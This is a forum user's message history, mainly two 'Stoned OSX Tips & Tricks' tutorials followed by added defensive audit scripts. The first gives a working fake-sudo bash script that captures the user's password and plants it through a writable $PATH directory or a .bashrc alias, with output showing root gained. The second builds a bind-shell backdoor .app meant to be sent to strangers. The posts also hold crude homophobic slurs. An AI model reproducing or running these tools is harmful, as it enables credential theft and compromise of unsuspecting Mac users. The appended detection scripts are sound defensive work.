

Messages - Spacetoast

1
You're right, but I never specified we were targeting the average user, and I never said we weren't. I simply applied a simple, quick method to the OSX platform. I can think of several use cases where this would be a viable method, but that's not what this article is about. My goal isn't to hold your hand through every possible scenario.

2
Nice quality tutorial, just as high quality as your LSD is.
P.S. I'm also a huge homo that loves penises in my mouth.

3
General discussion / Re: What were your Christmas presents?
« on: December 27, 2015, 02:49:16 am »
My family donated $400 to a charity that provides bikes to families in a third-world country. This allows them to cover farther distances faster and with less effort, as well as carry more to/from the market, meaning they can earn more money faster. Ohh, I also got a hair brush. :)

4
High Quality Tutorials / SSOSXTT II - Ghetto Privilege Escalation on OSX
« on: December 12, 2015, 12:18:52 am »
Spacecow's Stoned OSX Tips & Tricks II

Ghetto Privilege Escalation on OSX

In this tutorial we will be putting an OSX spin on the article Ghetto privilege escalation with bashrc. For this scenario, we have compromised an OSX host using an advanced version of our l337 .app backdoor and are now trying to gain higher privs by simply stealing the user's password. In this case we know our target is a nerd (maybe he was tricked into running the infected app by a Belgian on IRC) and he will eventually run the sudo command in a terminal, so that will be our target.


Building our fake psudo prompt:

We will start by getting the output of the sudo binary on OSX when we enter an invalid password.

Code: [Select]
$ sudo ls
Password:
Sorry, try again.
Password:
Sorry, try again.
Password:
Sorry, try again.
sudo: 3 incorrect password attempts

Now we will build a quick bash script to mimic this output. Our script will behave a little differently from the script in the original article, in that it will:
  • Only execute once, if the output file does not already exist.
  • Fail 3 times to be certain it's the right password.
  • Exit with error code 1 on the first run.

Code: (bash) [Select]
#!/bin/bash
# Fake sudo: on the first run, log three "wrong" password attempts and fail
# exactly like the real sudo; on every later run, pass through to the real one.
TARGET="/tmp/$(whoami)-psudo"

if [ ! -f "$TARGET" ]; then
  for n in 1 2 3; do
    echo -n "Password:"
    stty -echo                      # hide the typed characters like the real prompt
    read -r password
    stty echo
    echo ""
    echo "$(whoami):$password" >> "$TARGET"
    sleep 1                         # mimic the pause sudo takes after a failed attempt
    echo "Sorry, try again." 1>&2
  done
  echo "sudo: 3 incorrect password attempts" 1>&2
  exit 1
fi

# Absolute path: when this script is itself named 'sudo' and sits earlier in
# $PATH (Execution Method 1), a bare 'sudo' here would re-run this script.
/usr/bin/sudo "$@"


Execution Method 1: Abusing $PATH:

After writing/copying our script to the target system, we will first check the $PATH variable to see if it has been misconfigured in any way.

Code: [Select]
$ which sudo
/usr/bin/sudo
$ echo "$PATH"
/Users/Spacecow/.dnx/runtimes/dnx-mono.1.0.0-beta4/bin:/Users/Spacecow/.rbenv/shims:/Users/Spacecow/.rbenv/bin:/usr/local/opt/nvm/v0.10.32/bin:/Users/Spacecow/.bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/lib/node_modules:/usr/local/go/bin

We can see that on my system there are multiple directories in my path before the location of my sudo binary, and so we will attempt to move our script to one of these writable directories.

Code: [Select]
$ ls -ld /Users/Spacecow/.bin/
drwxr-xr-x  25 Spacecow  staff  850 Dec 10 16:49 /Users/Spacecow/.bin

Now we simply rename our script to 'sudo', make it executable and wait for the user to run it.

Code: [Select]
$ ls -l /tmp/Spacecow-psudo
ls: /tmp/Spacecow-psudo: No such file or directory
$ sudo su
Password:
Sorry, try again.
Password:
Sorry, try again.
Password:
Sorry, try again.
sudo: 3 incorrect password attempts
$ cat /tmp/Spacecow-psudo
Spacecow:password
Spacecow:password
Spacecow:password
$ sudo su
Password:
# whoami
root


Execution Method 2: Writing to .bashrc:

If our initial check for a misconfigured $PATH yields no fruit, fear not, we can still resort to writing an alias entry in the user's .bashrc or .zshrc. In this case our script is in /tmp/psudo.

Code: [Select]
$ echo 'alias sudo="/tmp/psudo"' >> ~/.bashrc


Conclusion:

Yet again this is a rather simple method of exploitation, but it will continue to be a viable attack vector for a while. Don't forget that most of this tutorial is a simple OSX implementation of the original article posted earlier, so go read it to get the most information out of this post.

Stay tuned for more related tutorials from our OSX series. Please let me know about any topics you would like covered in future tutorials, any comments/corrections you have or if you're a macfag interested in contributing to a tutorial.

Sincerely yours,
    -Spacecow
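
The two hooks this post relies on (a user-writable directory searched before the real sudo in $PATH, and an `alias sudo=` or `sudo()` function planted in a shell rc file) are exactly what a defender, or an attacker doing recon on a new host, wants to enumerate. The audit below is an added example, not code from the post above or from its author. It reuses the $PATH printed in Execution Method 1 as sample input; the writable/executable probes are injectable so the logic can be exercised without the author's filesystem. The rc file list covers ~/.bash_profile as well as ~/.bashrc because Terminal.app starts login shells, which read ~/.bash_profile and only read ~/.bashrc if that file sources it.

```python
"""Audit for the two sudo-shadowing hooks used in the post above.

Added example (not the post's own code). TUTORIAL_PATH is the $PATH the post
prints; everything else (function names, the rc file list) is my own choice.
"""
import os
import re

# The $PATH printed in Execution Method 1 of the post.
TUTORIAL_PATH = (
    "/Users/Spacecow/.dnx/runtimes/dnx-mono.1.0.0-beta4/bin:"
    "/Users/Spacecow/.rbenv/shims:/Users/Spacecow/.rbenv/bin:"
    "/usr/local/opt/nvm/v0.10.32/bin:/Users/Spacecow/.bin:/usr/local/bin:"
    "/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/lib/node_modules:/usr/local/go/bin"
)


def _default_writable(d):
    return os.path.isdir(d) and os.access(d, os.W_OK)


def _default_executable(p):
    return os.path.isfile(p) and os.access(p, os.X_OK)


def split_path(path_str):
    """Split a PATH string; an empty element means the current directory."""
    return [d if d else "." for d in path_str.split(":")]


def hijackable_dirs(path_str, real_dir, writable=_default_writable):
    """Directories searched before `real_dir` that the current user can write to.
    A fake `sudo` dropped in any of them shadows the real binary. Note that on
    a Homebrew host /usr/local/bin is commonly user-writable and precedes /usr/bin."""
    found = []
    for d in split_path(path_str):
        if d == real_dir:
            break  # everything after this is searched later than the real binary
        if writable(d):
            found.append(d)
    return found


def resolve_command(name, path_str, executable=_default_executable):
    """First executable `name` along PATH, i.e. what `which name` would print."""
    for d in split_path(path_str):
        candidate = os.path.join(d, name)
        if executable(candidate):
            return candidate
    return None


# alias sudo=..., sudo() {...}, or function sudo ... at the start of a line.
SUDO_OVERRIDE = re.compile(r"^\s*(?:alias\s+sudo=|sudo\s*\(\)|function\s+sudo\b)")


def find_sudo_overrides(rc_text):
    """(line number, line) for every alias/function definition of sudo in rc text."""
    return [(i, line) for i, line in enumerate(rc_text.splitlines(), 1)
            if SUDO_OVERRIDE.match(line)]


def audit_current_user(rc_files=("~/.bashrc", "~/.bash_profile", "~/.zshrc", "~/.profile")):
    """Run the checks against the live environment and return a report dict."""
    path_str = os.environ.get("PATH", "")
    real = "/usr/bin/sudo"  # where `which sudo` pointed in the post
    report = {
        "resolved_sudo": resolve_command("sudo", path_str),
        "writable_before_real": hijackable_dirs(path_str, os.path.dirname(real)),
        "rc_overrides": {},
    }
    for rc in rc_files:
        p = os.path.expanduser(rc)
        if os.path.isfile(p):
            with open(p, errors="replace") as fh:
                hits = find_sudo_overrides(fh.read())
            if hits:
                report["rc_overrides"][p] = hits
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(audit_current_user(), indent=2))
```

Run it as a script on the host to get a JSON report; a `resolved_sudo` other than /usr/bin/sudo, a non-empty `writable_before_real`, or any `rc_overrides` hit is the condition the post exploits. The fix on the defensive side is the usual one: keep user-writable directories out of the front of $PATH and treat a `sudo` alias or function in an rc file as hostile until proven otherwise.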

5
Spacecow's Stoned OSX Tips & Tricks I

Creating a simple python backdoor .app for OSX

In this first tutorial, we will be building a standalone python backdoor in an executable .app format for an OSX target. When complete, our app will include a standalone python3.4 interpreter, a simple backdoor and the proper folder hierarchy to turn it into an App bundle that can be executed.


Requirements:
  • A python script that will create a bind shell.
  • The cookiecutter tool installable from pip.
  • A standalone python interpreter for OSX.

Downloading Required Tools:
The first thing we will do is download a simple python shell. In this example we will use a bind shell from https://github.com/Spacecow99/python-pty-shells/master/sctp_pty_bind.py which was written by infodox from insecurety.net.

Code: [Select]
$ wget https://raw.githubusercontent.com/Spacecow99/python-pty-shells/master/sctp_pty_bind.py

Our next step is to install cookiecutter from pip. Cookiecutter is a tool from BeeWare used to create project templates for different platforms including OSX, iOS and Android.

Code: [Select]
$ pip install cookiecutter


Creating Our Backdoor:

After this we must create an OSX project by cloning a template repo, in this case from https://github.com/pybee/Python-OSX-template.
When we are prompted for values, you are free to set whatever you wish. In the example below, I have already downloaded the template previously, so we will be re-cloning it just to show you, as well as leaving all the values at their defaults.

Code: [Select]
$ cookiecutter https://github.com/pybee/Python-OSX-template
You've cloned /Users/user/.cookiecutters/Python-OSX-template before. Is it okay to delete and re-clone it? [yes]: yes
Cloning into 'Python-OSX-template'...
remote: Counting objects: 34, done.
remote: Total 34 (delta 0), reused 0 (delta 0), pack-reused 34
Unpacking objects: 100% (34/34), done.
Checking connectivity... done.
app_name [appname]:
formal_name [App Name]:
bundle [com.example]:
year [2015]:
month [July]:

This will produce an 'App\ Name.app' folder or '[formal_name].app' with the following directory tree:

Code: [Select]
App\ Name.app
└── Contents
       ├── Info.plist
       ├── MacOS
       │    └── App\ Name
       └── Resources/
              ├── app/
              │     └── README
              └── app_packages/
                     └── README

Our application code will go under the app/ directory. The native code will be looking for an appname/__main__.py file as the entry point. We will create an appname directory and paste our backdoor code into appname/__main__.py.

Code: [Select]
app/
└──appname/
       └──__main__.py

The final step is to add a standalone python interpreter so the app can be run regardless of what python versions are available on the system. We will download our interpreter from https://github.com/pybee/Python-OSX-support/, extract it and copy it to the Resources/ directory.

Code: [Select]
$ pwd
'/Users/user/Programming/App\ Name.app/Contents/Resources/'
$ wget https://github.com/pybee/Python-OSX-support/releases/download/3.4.2-b1/Python-3.4.2-OSX-support.b1.tar.gz
$ tar -xzf Python-3.4.2-OSX-support.b1.tar.gz
$ rm Python-3.4.2-OSX-support.b1.tar.gz


This should leave us with a python/ directory containing a python3.4 binary. And with that we should be ready to start sending our application to random strangers on the internet. It will execute once someone clicks on the App\ Name.app icon and remain in the taskbar while the backdoor is running.


Conclusion:

Now this is a rather simple and easily discoverable attack, but the point of this is to demonstrate how simple it is to quickly throw together a backdoor for OSX targets. With a little more thought one can turn this into a quick and effective attack vector, but that's up to you to think of.

Stay tuned for more related tutorials from our OSX series. Please let me know about any topics you would like covered in future tutorials, any comments/corrections you have or if you're a macfag interested in contributing to a tutorial.

Sincerely yours,
    -Spacecow
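
The bundle this post builds has a recognisable shape: a native launcher in Contents/MacOS named by CFBundleExecutable in Info.plist, a whole Python interpreter unpacked under Contents/Resources/python, and a script entry point at Contents/Resources/app/<name>/__main__.py. The triage script below is an added example, not code from the post or from the pybee template, and it is written from the other side of the table: given a .app directory it parses Info.plist with plistlib, checks that the declared launcher exists, and flags bundles that carry their own interpreter plus a script entry point. The Info.plist sample and the file listing embedded in it are constructed to mirror the tree shown in the post (the template's real Info.plist is not reproduced on the page). Two caveats from this side: Gatekeeper blocks an unsigned app downloaded from the internet by default until the user explicitly overrides it, and `codesign --verify` (a real macOS tool, only reachable when the script runs on a Mac) fails for a bundle built this way unless it has been signed.

```python
"""Triage a macOS .app bundle for the self-contained Python layout described
in the post above.

Added example (not the post's or the template's own code). SAMPLE_INFO_PLIST
and SAMPLE_BUNDLE_FILES are constructed to match the tree the post shows.
"""
import os
import plistlib
import shutil
import subprocess

# Constructed Info.plist with the keys this check needs.
SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>CFBundleExecutable</key><string>App Name</string>
  <key>CFBundleIdentifier</key><string>com.example.appname</string>
  <key>CFBundleName</key><string>App Name</string>
</dict>
</plist>
"""

# Constructed listing of the finished bundle, relative to the .app directory,
# after __main__.py has been added and the interpreter tarball unpacked.
SAMPLE_BUNDLE_FILES = [
    "Contents/Info.plist",
    "Contents/MacOS/App Name",
    "Contents/Resources/app/appname/__main__.py",
    "Contents/Resources/app_packages/README",
    "Contents/Resources/python/bin/python3.4",
]


def parse_info_plist(data):
    """Parse Info.plist bytes (XML or binary plist) into a dict."""
    return plistlib.loads(data)


def classify_bundle(files, info):
    """Sorted findings for a bundle given its relative file paths and parsed Info.plist."""
    files = set(files)
    findings = []
    exe = info.get("CFBundleExecutable")
    if not exe:
        findings.append("no-CFBundleExecutable")
    elif f"Contents/MacOS/{exe}" not in files:
        findings.append("launcher-missing")  # Finder would refuse to launch it
    if any(f.startswith("Contents/Resources/python/") for f in files):
        findings.append("embedded-python-interpreter")
    if any(f.startswith("Contents/Resources/app/") and f.endswith("/__main__.py") for f in files):
        findings.append("python-entry-point")
    if "embedded-python-interpreter" in findings and "python-entry-point" in findings:
        findings.append("self-contained-python-app")  # the layout the post produces
    return sorted(findings)


def list_bundle(bundle_dir):
    """All files under a bundle, as forward-slash paths relative to the .app."""
    out = []
    for root, _dirs, names in os.walk(bundle_dir):
        for n in names:
            rel = os.path.relpath(os.path.join(root, n), bundle_dir)
            out.append(rel.replace(os.sep, "/"))
    return out


def inspect_bundle(bundle_dir):
    """Read Contents/Info.plist from a real bundle on disk and classify it."""
    with open(os.path.join(bundle_dir, "Contents", "Info.plist"), "rb") as fh:
        info = plistlib.load(fh)
    return classify_bundle(list_bundle(bundle_dir), info)


def codesign_verifies(bundle_dir):
    """True/False from `codesign --verify --deep --strict`, or None when codesign
    is not available (i.e. the script is not running on macOS)."""
    if shutil.which("codesign") is None:
        return None
    proc = subprocess.run(["codesign", "--verify", "--deep", "--strict", bundle_dir],
                          capture_output=True)
    return proc.returncode == 0


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        print(path, inspect_bundle(path), "signed:", codesign_verifies(path))
```

Point it at one or more .app directories (`python3 triage.py "/path/to/App Name.app"`); a result containing `self-contained-python-app` with `signed: False` is the profile of the bundle built in this post. The classification is deliberately structural rather than signature-based, so it also catches the same layout produced by other Python-to-app packagers.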
